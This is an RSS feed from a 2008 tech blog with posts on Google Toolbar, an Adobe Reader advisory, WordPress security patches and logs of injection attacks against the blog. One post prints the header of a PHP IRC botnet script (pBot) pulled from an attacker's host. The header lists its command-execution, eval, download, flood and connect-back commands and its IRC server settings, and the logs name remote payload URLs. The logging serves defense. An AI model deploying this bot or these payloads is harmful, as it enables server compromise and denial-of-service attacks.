<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; Noah Ark</title>
	<atom:link href="http://42.kaizeku.com/author/livewriter/feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Google Toolbar 5 &#946;eta</title>
		<link>http://42.kaizeku.com/google/google-toolbar-5-beta/</link>
		<comments>http://42.kaizeku.com/google/google-toolbar-5-beta/#comments</comments>
		<pubDate>Mon, 11 Feb 2008 19:41:48 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Google]]></category>

		<category><![CDATA[Web Browsers]]></category>

		<category><![CDATA[addons]]></category>

		<category><![CDATA[google+toolbar]]></category>

		<category><![CDATA[pr]]></category>

		<category><![CDATA[toolbar]]></category>

		<category><![CDATA[webmaster]]></category>

		<category><![CDATA[YouTube]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/google/google-toolbar-5-beta/</guid>
		<description><![CDATA[

Google Toolbar 5 (&#946;eta) is out. You can download it at toolbar.google.com/T5/. 
Whats New

Custom Button and new Google Gadgets Support
Smart suggestion for navigation error (ie: 400 - 500 error)
Google Notebook Integration - save notes and image
Improved Autofill

Check out the Google Toolbar 5 (beta) youtube videos &#8595;

Google Toolbar 5 (beta) New Features Screencast


External Links

Google Toolbar 5 [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/google-pin-preview-by-chaoskaizer.png' alt='google-pin-preview-by-chaoskaizer.png' longdesc="http://toolbar.google.com/T5/intl/en/index.html" width="128" height="128" class="photo thumb- fl"/><strong>Google Toolbar 5</strong> (&beta;eta) is out. You can download it at <a class="exturl icn-r1" href="http://toolbar.google.com/T5/intl/en/index.html">toolbar.google.com/T5/</a>. </p>
<h2>Whats New</h2>
<ul class="xoxo exturl">
<li><a href="http://toolbar.google.com/T5/intl/en/features.html#custombuttons">Custom Button and new Google Gadgets Support</a></li>
<li><a href="http://toolbar.google.com/T5/intl/en/features.html#ld">Smart suggestion for navigation error (ie: 400 - 500 error)</a></li>
<li><a href="http://toolbar.google.com/T5/intl/en/features.html#notebook">Google Notebook Integration - save notes and image</a></li>
<li><a href="http://toolbar.google.com/T5/intl/en/features.html#autofill">Improved Autofill</a></li>
</ul>
<p>Check out the Google Toolbar 5 (beta) youtube videos &darr;<br />
<span id="more-208"></span></p>
<h2 class="cb mgt">Google Toolbar 5 (beta) New Features Screencast</h2>
<div clas="mgt" style="width:450px;overflow:hidden;margin:0pt auto !important">
<object width="425" height="373"><param name="movie" value="http://www.youtube.com/v/M9Whs0IpK_g&amp;rel=0&#038;border=1"></param><param name="wmode" value="transparent"></param></object><embed src="http://www.youtube.com/v/M9Whs0IpK_g&amp;rel=0&amp;border=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="373"></embed></div>
<h2 class="cb mgt">External Links</h2>
<ul class="xoxo exturl">
<li><a href="http://toolbar.google.com/T5/intl/en/index.html" title="Download Google Toolbar 5 Beta">Google Toolbar 5 Beta Download Page</a></li>
<li><a href="http://toolbar.google.com/T5/intl/en/features.html" title="Google Toolbar 5 beta Features List">Google Toolbar 5 beta Features List</a></li>
<li><a href="http://googleblog.blogspot.com/2007/12/google-toolbar-take-your-tools-with-you.html" title="Google Toolbar: Take your tools with you">Google&#8217;s Blog &rarr; Google Toolbar: Take your tools with you </a>
<li><a href="http://www.google.com/support/toolbar/?hl=en">Google Toolbar Help Center</a></li>
<li><a href="http://www.mattcutts.com/blog/404-pages-in-google-toolbar/">Google&#8217;s Matt Cutts &rarr; How 404 pages work in Google Toolbar Beta 5 </a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/google/google-toolbar-5-beta/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Adobe Acrobat, Acrobat 3D &#038; Reader Multiple Vulnerabilities</title>
		<link>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</link>
		<comments>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/#comments</comments>
		<pubDate>Sat, 09 Feb 2008 14:35:38 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Acrobat Reader]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[acrobat]]></category>

		<category><![CDATA[acrobat3d]]></category>

		<category><![CDATA[adobe+reader]]></category>

		<category><![CDATA[buffer+overflow]]></category>

		<category><![CDATA[reader]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</guid>
		<description><![CDATA[One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code. The code will run with the privileges of the target user opening the PDF document.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png' alt='adobe reader' longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png" width="110" height="110" title="Adobe Reader" class="photo thumb- fl" />A JavaScript <a class="exturl icn-r1" href="http://en.wikipedia.org/wiki/Buffer_overflow">Buffer Overflow</a> in <strong class="fw-"><a href="http://www.adobe.com/products/acrobat/">Adobe Acrobat</a></strong>, <strong class="fw-"><a href="http://www.adobe.com/products/acrobat3d/">Acrobat 3D</a></strong> &#038; <strong class="fw-"><a href="http://www.adobe.com/products/reader/">Reader</a></strong> allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document. </p>
<p>Excerpt from <em>iDefense </em>Public Advisory;</p>
<blockquote cite="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656"><p class="cite">Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.</p>
</blockquote>
<h2>Workaround</h2>
<p>Disabled Adobe Reader &#038; Acrobat JavaScript. Perform Update &darr;</p>
<h2>Update -Adobe Acrobat &#038; Reader version 8.1.2 </h2>
<p>Adobe released version 8.1.2 of Adobe Reader, Acrobat &#038; Acrobat 3D to address<br />
these vulnerabilities.</p>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/go/getreader" title="Download Adobe Reader 8.1.2">Adobe Reader 7 and 8 users update to Adobe Reader 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3849" title="Download Acrobat 8.1.2 for Windows">Acrobat 8 users on Windows update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3856" title="Download Acrobat 8.1.2 for Mac">Acrobat 8 users on Macintosh update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3850" title="Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2">Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2</a></li>
</ul>
<p class="mgt">These <a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656" class="exturl icn-r1" >vulnerabilities</a> were discovered by <span class="vcard"><a href="http://labs.idefense.com/" class="url fn microformat icn-r1"><span class="give-name">Greg </span> <span class="family-name">MacManus</span></a> of <span class="org"><a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=655">VeriSign iDefense Labs</a></span></span>. </p>
<p><span id="more-194"></span></p>
<h2>Related Posts</h2>
<ul class="xoxo exturl">
<li><a class="inturl" href="/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/" title="How to safely remove AcroRd32Info.exe">How to safely remove AcroRd32Info.exe (Adobe Reader)</a></li>
</ul>
<h2 class="mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/support/security/advisories/apsa08-01.html" title="Security update available for Adobe Reader and Acrobat 8">Security update available for Adobe Reader and Acrobat 8 (APSA08-01)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/#comments</comments>
		<pubDate>Wed, 06 Feb 2008 22:59:53 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[googlebot]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</guid>
		<description><![CDATA[

 Today&#8217;s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &#8595;. The first attacker is from 212.24.62.200 &#8594; udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> Today&#8217;s we just upgrade from <strong>WordPress 2.3.2</strong> to <strong>2.3.3 security release</strong>. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &darr;. The first attacker is from 212.24.62.200 &rarr; udkado.ru masking their useragent as <strong>Googlebot</strong> (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort. </p>
<p>The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of <abbr title="Dynamic Domain Name Server">DDNS</abbr> (china &rarr; korea &rarr; us ). Noticeably the scans pattern is predictable. From our <a href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Feb 5th attack</a> all these botnet is targeting certain search keywords <em>security, injection</em> so we setup a honey-pot right on that particular URL.<br />
<span id="more-189"></span></p>
<h2>Hacking Attempts on Kakkoi</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=212.24.62.200" class="exturl icn-r" rel="nofollow">212.24.62.200</a></small></td>
<td><small><a href="http://www.useragentstring.com/pages/Googlebot/">Googlebot</a></small></td>
<td>1</td>
<td><small><a href="http://api.hostip.info/?ip=212.24.62.200" class="exturl icn-r" rel="nofollow">Russia</a></small></td>
<td>
<ul class="xoxo r">
<li><small>www.yahoo.com</small></li>
<li><small>Request URI: <a href="/uri/d3d3LnlhaG9vLmNvbQ.curie,80,302" rev="curie:302" title="Yahoo!">www.yahoo.com</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=61.152.158.46" class="exturl icn-r" rel="nofollow">61.152.158.46</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=61.152.158.46" class="exturl icn-r" rel="nofollow">China</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td>
<ol class="xoxo r">
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.88.3.47" class="exturl icn-r" rel="nofollow">85.88.3.47</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=74.205.123.49" class="exturl icn-r" rel="nofollow">74.205.123.49</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=210.205.6.161" class="exturl icn-r" rel="nofollow">210.205.6.161</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=207.44.246.45" class="exturl icn-r" rel="nofollow">207.44.246.45</a></small></li>
</ol>
</td>
<td>N/A</td>
<td>16</td>
<td>
<ol class="xoxo r">
<li><small><a href="http://api.hostip.info/?ip=85.88.3.47" class="exturl icn-r" rel="nofollow">Germany</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=74.205.123.49" class="exturl icn-r" rel="nofollow">US</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=210.205.6.161" class="exturl icn-r" rel="nofollow">Korea</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=207.44.246.45" class="exturl icn-r" rel="nofollow">US</a></small></li>
</ol>
</td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>The Bot-herder Host</h2>
<p>Part of class <strong>pBot</strong> source taken from <tt class="di">http://basiclifesaving.org/mycomments/rom.txt</tt></p>
<pre class="prebox">
&lt;? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ &lt;admin@xdevil.org&gt;
 *
 * COMMANDS:
 *
 * .user &lt;password&gt; //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail &lt;to&gt; &lt;from&gt; &lt;subject&gt; &lt;msg&gt; //send an email
 * .dns &lt;IP|HOST&gt; //dns lookup
 * .download &lt;URL&gt; &lt;filename&gt; //download a file
 * .exec &lt;cmd&gt; // uses exec() //execute a command
 * .sexec &lt;cmd&gt; // uses shell_exec() //execute a command
 * .cmd &lt;cmd&gt; // uses popen() //execute a command
 * .info //get system information
 * .php &lt;php code&gt; // uses eval() //execute php code
 * .tcpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;port&gt; &lt;delay&gt; //tcpflood attack
 * .udpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;delay&gt; //udpflood attack
 * .raw &lt;cmd&gt; //raw IRC command
 * .rndnick //change nickname
 * .pscan &lt;host&gt; &lt;port&gt; //port scan
 * .safe // test safe_mode (dvl)
 * .inbox &lt;to&gt; // test inbox (dvl)
 * .conback &lt;ip&gt; &lt;port&gt; // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo &quot;Ok unlocker. We did i!&quot;;

class pBot
{
 var $config = array(&quot;server&quot;=&gt;&quot;Bucharest.ro.eu.ultra-chat.org&quot;,
 &quot;port&quot;=&gt;&quot;6667&quot;,
 &quot;pass&quot;=&gt;&quot;n&quot;,
 &quot;prefix&quot;=&gt;&quot;[R]&quot;,
 &quot;maxrand&quot;=&gt;&quot;4&quot;,
 &quot;chan&quot;=&gt;&quot;#unlocker&quot;,
 &quot;chan2&quot;=&gt;&quot;#unlocker&quot;,
 &quot;key&quot;=&gt;&quot;n&quot;,
 &quot;modes&quot;=&gt;&quot;+p&quot;,
 &quot;password&quot;=&gt;&quot;n&quot;,
 &quot;trigger&quot;=&gt;&quot;.&quot;,
 &quot;hostauth&quot;=&gt;&quot;Robert.users.ultra-chat.org&quot; // * for any hostname (remember: /setvhost xdevil.org)
 );
</pre>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</a></li>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Dynamic_DNS">Dynamic DNS</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 12:13:27 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</guid>
		<description><![CDATA[

 I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful &#8595;.

Failed Hacking Attempts
Sort by Injection type.



IP / DDNS
UA
ATT
Country
Params




85.25.10.30
N/A
2
Germany


http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt
Request URI: /security/injection/




]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these <a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Botnet</a> (Bot-herder) will be published in this post. Somebody might find the informations useful &darr;.<br />
<span id="more-178"></span></p>
<h2>Failed Hacking Attempts</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.25.10.30" class="exturl icn-r" rel="nofollow">85.25.10.30</a></small></td>
<td>N/A</td>
<td>2</td>
<td><small><a href="http://api.hostip.info/?ip=85.25.10.30" class="exturl icn-r" rel="nofollow">Germany</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt</small></li>
<li><small>Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=200.226.246.22class="exturl icn-r" rel="nofollow">200.226.246.22</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=200.226.246.22" class="exturl icn-r" rel="nofollow">Brazil</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=203.151.233.24" class="exturl icn-r" rel="nofollow">203.151.233.24</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=203.151.233.24" class="exturl icn-r" rel="nofollow">Thailand</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=69.10.135.176" class="exturl icn-r" rel="nofollow">69.10.135.176</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=69.10.135.176" class="exturl icn-r" rel="nofollow">Canada</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://chmod.altervista.org/modalita/cmd2.txt</small></li>
<li><small> Request URI: <a href="/security/vulnerability/fixes-statscounter-updatesh-vulnerability/">/fixes-statscounter-updatesh-vulnerability/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>WordPress 2.3.3 Security Release</title>
		<link>http://42.kaizeku.com/wordpress/wordpress-233-security-release/</link>
		<comments>http://42.kaizeku.com/wordpress/wordpress-233-security-release/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 06:01:34 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[patch]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/wordpress-233-securities-release/</guid>
		<description><![CDATA[

Wordpress 2.3.3 fixes a few minor bugs and the debatable Wordpress 2.3.2 XMLRPC vulnerability. It took 4 months to track the XMLRPC exploit and 1 days for the patch to be release. Kudos to WordPress Developer especially Ryan &#038; Joseph Scott for these quick security release.
Wordpress 2.3.2 XMLRPC vulnerability patches by josephscott

xmlrpc.php.diff (0.7 kB) -on [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img class="fl" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/wordpress-small.png' alt='wordpress small logo' width="33" height="33" longdesc="http://blog.kakkoi.net/wp-content/uploads/2008/02/wordpress-small.png" /><strong>Wordpress 2.3.3</strong> fixes a few <a href="http://trac.wordpress.org/query?status=closed&#038;milestone=2.3.3" class="exturl icn-r">minor bugs</a> and the debatable <a href="/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/">Wordpress 2.3.2 XMLRPC vulnerability</a>. It took 4 months to track the <em><a href="http://trac.wordpress.org/ticket/5313" class="exturl icn-r">XMLRPC exploit</a></em> and 1 days for the patch to be release. Kudos to WordPress Developer especially <span class="vcard"><a href="http://boren.nu/" class="url fn microformat icn-l">Ryan</a></span> &#038; <span class="vcard"><a href="http://joseph.randomnetworks.com/" class="url fn microformat icn-l"><span class="given-name">Joseph</span> <span class="family-name">Scott</span></a></span> for these quick security release.</p>
<h2>Wordpress 2.3.2 XMLRPC vulnerability patches by josephscott</h2>
<ul>
<li><a class="exturl icn-r" href="http://trac.wordpress.org/attachment/ticket/5313/xmlrpc.php.diff">xmlrpc.php.diff</a> (0.7 kB) -on 02/02/08 16:53:22.</li>
<li><a class="exturl icn-r" href="http://trac.wordpress.org/attachment/ticket/5313/xmlrpc.php.2.diff">xmlrpc.php.2.diff</a> (3.2 kB) - on 02/03/08 04:49:26.</li>
<li><a class="exturl icn-r" href="http://trac.wordpress.org/attachment/ticket/5313/2.3-xmlrpc.php.diff">2.3-xmlrpc.php.diff</a> (3.2 kB) - on 02/04/08 18:48:23 (2.3.3).</li>
</ul>
<p><span id="more-174"></span></p>
<h2>External Links</h2>
<ul>
<li><a class="exturl icn-r" href="http://wordpress.org/download/">Wordpress 2.3.3 Download</a></li>
<li><a class="exturl icn-r" href="http://wordpress.org/development/2008/02/wordpress-233/">Wordpress Development Blog</a></li>
<li><a class="exturl icn-r" href="http://trac.wordpress.org/milestone/2.3.3">Wordpress 2.3.3 Milestone</a></li>
<li><a class="exturl icn-r" href="http://www.village-idiot.org/archives/2008/02/04/wordpress-2-3-3/">village-idiot.org &rarr; WordPress 2.3.3 List of changed files</a> <small>(download available)</small></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/wordpress-233-security-release/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Wordpress 2.3.2 XMLRPC Exploit Unofficial Patch</title>
		<link>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/</link>
		<comments>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/#comments</comments>
		<pubDate>Sat, 02 Feb 2008 21:32:51 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[0-day]]></category>

		<category><![CDATA[metaWeblog]]></category>

		<category><![CDATA[patch]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/</guid>
		<description><![CDATA[This issue has been raised 4 months ago (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WP Developer decide to stop arguing on the mailing list and came out with WordPress securities fix release (maybe for v 2.3.5) You might want to try this “Temporary” workaround suggest by SecuriTeam - Paul (Yabba) Jones.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/2000455272489756911_rs.thumbnail.jpg' alt='this is relevant to my interest lolcat' width='128' height='100' longdesc='http://blog.kakkoi.net/wp-content/uploads/2008/02/2000455272489756911_rs.jpg' />This issue has been raised <a href="http://wordpress.org/support/topic/134928/">4 months ago</a> (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WordPress Developer release Official securities fix (v 2.3.2.1 || 2.3.5 ?? ) You might want to try this &#8220;debatable&#8221; patch by <a href="http://www.securiteam.com" class="exturl icn-r">SecuriTeam</a> - Paul (Yabba) Jones. </p>
<p class="notice cb mgt">Note: <span class="vcard"><a class="url fn microformat icn-r" href="http://ma.tt" title="Matt Mullenweg - PhotoMatt"><span class="given-name">Matt</span> <span class="family-name">Mullenweg</span></a></span> &#038; the <a href="http://lists.automattic.com/mailman/listinfo/wp-hackers">WP-Hackers</a> is against secureTeam &#8220;hasty-patch&#8221; and their <abbr title="Proof of Concept">POC</abbr> release. <small><a href="http://comox.textdrive.com/pipermail/wp-hackers/2008-February/017544" class="exturl icn-r">[wp-hackers] xmlrpc issue or no?</a></small>.</p>
<p><em>Excerpt from Wordpress Support Forum &raquo; <a href="http://wordpress.org/support/topic/134928/">iframe injection problem?</a></em></p>
<blockquote cite="http://wordpress.org/support/topic/134928/page/3#post-686803"><p class="quote"><a href="http://wordpress.org/support/topic/134928/page/3#post-686803" class="exturl icn-r">Matt Mullenweg</a> &rarr; [...] I would rather not have people think they&#8217;re safe and really not be, and there is a release coming shortly anyway. [...]<br />
If anyone is scared and wants a fix NOW, they should either turn off registration (which is off by default) or delete xmlrpc.php. <small>~ Feb 3, 2008</small> </p>
</blockquote>
<p><span id="more-170"></span></p>
